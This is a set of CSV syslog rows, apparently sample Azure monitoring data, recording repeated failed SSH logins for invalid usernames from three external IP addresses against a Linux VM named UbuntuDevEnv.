+15466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:02,UbuntuDevEnv,2019-06-26 06:12:01,auth,UbuntuDevEnv,info,Failed password for invalid user galaxy from 106.12.27.140 port 52023 ssh2,20415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,galaxy,106.12.27.1,52023,,
+15467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:02,UbuntuDevEnv,2019-06-26 06:12:02,auth,UbuntuDevEnv,info,Disconnected from invalid user galaxy 106.12.27.140 port 52023 [preauth],20415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,galaxy,106.12.27.1,52023,,
+15468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:02,UbuntuDevEnv,2019-06-26 06:12:02,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 52023:11: Bye Bye [preauth],20415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,52023,,
+15469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:11,UbuntuDevEnv,2019-06-26 06:12:11,auth,UbuntuDevEnv,info,Invalid user chun from 45.59.69.138 port 42004,20463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chun,45.59.69.1,42004,,
+15470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:11,UbuntuDevEnv,2019-06-26 06:12:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,20463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:11,UbuntuDevEnv,2019-06-26 06:12:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:13,UbuntuDevEnv,2019-06-26 06:12:13,auth,UbuntuDevEnv,info,Failed password for invalid user chun from 45.59.69.138 port 42004 ssh2,20463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chun,45.59.69.1,42004,,
+15473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:13,UbuntuDevEnv,2019-06-26 06:12:13,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 42004:11: Bye Bye [preauth],20463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,42004,,
+15474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:12:13,UbuntuDevEnv,2019-06-26 06:12:13,auth,UbuntuDevEnv,info,Disconnected from invalid user chun 45.59.69.138 port 42004 [preauth],20463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chun,45.59.69.1,42004,,
+15475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:02,UbuntuDevEnv,2019-06-26 06:13:01,auth,UbuntuDevEnv,info,Invalid user admin from 106.12.27.140 port 59997,20637,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.12.27.1,59997,,
+15476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:02,UbuntuDevEnv,2019-06-26 06:13:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20637,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:02,UbuntuDevEnv,2019-06-26 06:13:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,20637,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:04,UbuntuDevEnv,2019-06-26 06:13:03,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 106.12.27.140 port 59997 ssh2,20637,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.12.27.1,59997,,
+15479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:05,UbuntuDevEnv,2019-06-26 06:13:04,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 59997:11: Bye Bye [preauth],20637,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,59997,,
+15480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:05,UbuntuDevEnv,2019-06-26 06:13:04,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 106.12.27.140 port 59997 [preauth],20637,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.12.27.1,59997,,
+15481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:10,UbuntuDevEnv,2019-06-26 06:13:09,auth,UbuntuDevEnv,info,Invalid user websphere from 139.99.98.248 port 54302,20673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,139.99.98.2,54302,,
+15482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:10,UbuntuDevEnv,2019-06-26 06:13:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,20673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:10,UbuntuDevEnv,2019-06-26 06:13:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:11,UbuntuDevEnv,2019-06-26 06:13:11,auth,UbuntuDevEnv,info,Failed password for invalid user websphere from 139.99.98.248 port 54302 ssh2,20673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,139.99.98.2,54302,,
+15485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:12,UbuntuDevEnv,2019-06-26 06:13:11,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 54302:11: Bye Bye [preauth],20673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,54302,,
+15486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:12,UbuntuDevEnv,2019-06-26 06:13:11,auth,UbuntuDevEnv,info,Disconnected from invalid user websphere 139.99.98.248 port 54302 [preauth],20673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,websphere,139.99.98.2,54302,,
+15487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:42,UbuntuDevEnv,2019-06-26 06:13:41,auth,UbuntuDevEnv,info,Invalid user mongo from 45.59.69.138 port 59574,20787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,45.59.69.1,59574,,
+15488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:42,UbuntuDevEnv,2019-06-26 06:13:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,20787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:42,UbuntuDevEnv,2019-06-26 06:13:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:44,UbuntuDevEnv,2019-06-26 06:13:44,auth,UbuntuDevEnv,info,Failed password for invalid user mongo from 45.59.69.138 port 59574 ssh2,20787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,45.59.69.1,59574,,
+15491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:44,UbuntuDevEnv,2019-06-26 06:13:44,auth,UbuntuDevEnv,info,Disconnected from invalid user mongo 45.59.69.138 port 59574 [preauth],20787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,45.59.69.1,59574,,
+15492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:13:44,UbuntuDevEnv,2019-06-26 06:13:44,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 59574:11: Bye Bye [preauth],20787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,59574,,
+15493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:04,UbuntuDevEnv,2019-06-26 06:14:03,auth,UbuntuDevEnv,info,Invalid user musikbot from 106.12.27.140 port 12970,20863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,106.12.27.1,12970,,
+15494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:04,UbuntuDevEnv,2019-06-26 06:14:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,20863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:04,UbuntuDevEnv,2019-06-26 06:14:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,20863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:05,UbuntuDevEnv,2019-06-26 06:14:05,auth,UbuntuDevEnv,info,Failed password for invalid user musikbot from 106.12.27.140 port 12970 ssh2,20863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,106.12.27.1,12970,,
+15497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:06,UbuntuDevEnv,2019-06-26 06:14:05,auth,UbuntuDevEnv,info,Disconnected from invalid user musikbot 106.12.27.140 port 12970 [preauth],20863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,106.12.27.1,12970,,
+15498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:06,UbuntuDevEnv,2019-06-26 06:14:05,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 12970:11: Bye Bye [preauth],20863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,12970,,
+15499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:49,UbuntuDevEnv,2019-06-26 06:14:48,auth,UbuntuDevEnv,info,Invalid user etienne from 139.99.98.248 port 43214,21133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,139.99.98.2,43214,,
+15500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:49,UbuntuDevEnv,2019-06-26 06:14:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,21133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:49,UbuntuDevEnv,2019-06-26 06:14:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:51,UbuntuDevEnv,2019-06-26 06:14:50,auth,UbuntuDevEnv,info,Failed password for invalid user etienne from 139.99.98.248 port 43214 ssh2,21133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,139.99.98.2,43214,,
+15503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:51,UbuntuDevEnv,2019-06-26 06:14:51,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 43214:11: Bye Bye [preauth],21133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,43214,,
+15504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:14:51,UbuntuDevEnv,2019-06-26 06:14:51,auth,UbuntuDevEnv,info,Disconnected from invalid user etienne 139.99.98.248 port 43214 [preauth],21133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etienne,139.99.98.2,43214,,
+15505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:05,UbuntuDevEnv,2019-06-26 06:15:05,auth,UbuntuDevEnv,info,Invalid user deploy from 106.12.27.140 port 20944,21227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,106.12.27.1,20944,,
+15506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:05,UbuntuDevEnv,2019-06-26 06:15:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,21227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:05,UbuntuDevEnv,2019-06-26 06:15:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:08,UbuntuDevEnv,2019-06-26 06:15:07,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 106.12.27.140 port 20944 ssh2,21227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,106.12.27.1,20944,,
+15509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:08,UbuntuDevEnv,2019-06-26 06:15:07,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 106.12.27.140 port 20944 [preauth],21227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,106.12.27.1,20944,,
+15510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:08,UbuntuDevEnv,2019-06-26 06:15:07,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 20944:11: Bye Bye [preauth],21227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,20944,,
+15511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:09,UbuntuDevEnv,2019-06-26 06:15:08,auth,UbuntuDevEnv,info,Invalid user ark from 45.59.69.138 port 48898,21263,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ark,45.59.69.1,48898,,
+15512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:09,UbuntuDevEnv,2019-06-26 06:15:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,21263,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:09,UbuntuDevEnv,2019-06-26 06:15:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,21263,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:11,UbuntuDevEnv,2019-06-26 06:15:10,auth,UbuntuDevEnv,info,Failed password for invalid user ark from 45.59.69.138 port 48898 ssh2,21263,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ark,45.59.69.1,48898,,
+15515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:11,UbuntuDevEnv,2019-06-26 06:15:10,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 48898:11: Bye Bye [preauth],21263,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,48898,,
+15516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:15:11,UbuntuDevEnv,2019-06-26 06:15:10,auth,UbuntuDevEnv,info,Disconnected from invalid user ark 45.59.69.138 port 48898 [preauth],21263,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ark,45.59.69.1,48898,,
+15517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:11,UbuntuDevEnv,2019-06-26 06:18:10,auth,UbuntuDevEnv,info,Invalid user caijie from 45.59.69.138 port 55794,27108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,caijie,45.59.69.1,55794,,
+15518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:11,UbuntuDevEnv,2019-06-26 06:18:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:11,UbuntuDevEnv,2019-06-26 06:18:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,27108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:11,UbuntuDevEnv,2019-06-26 06:18:11,auth,UbuntuDevEnv,info,Invalid user hadoop from 139.99.98.248 port 49270,27105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,139.99.98.2,49270,,
+15521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:11,UbuntuDevEnv,2019-06-26 06:18:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,27105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:11,UbuntuDevEnv,2019-06-26 06:18:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:12,UbuntuDevEnv,2019-06-26 06:18:11,auth,UbuntuDevEnv,info,Invalid user system from 106.12.27.140 port 44870,27104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,106.12.27.1,44870,,
+15524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:12,UbuntuDevEnv,2019-06-26 06:18:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,27104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:12,UbuntuDevEnv,2019-06-26 06:18:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
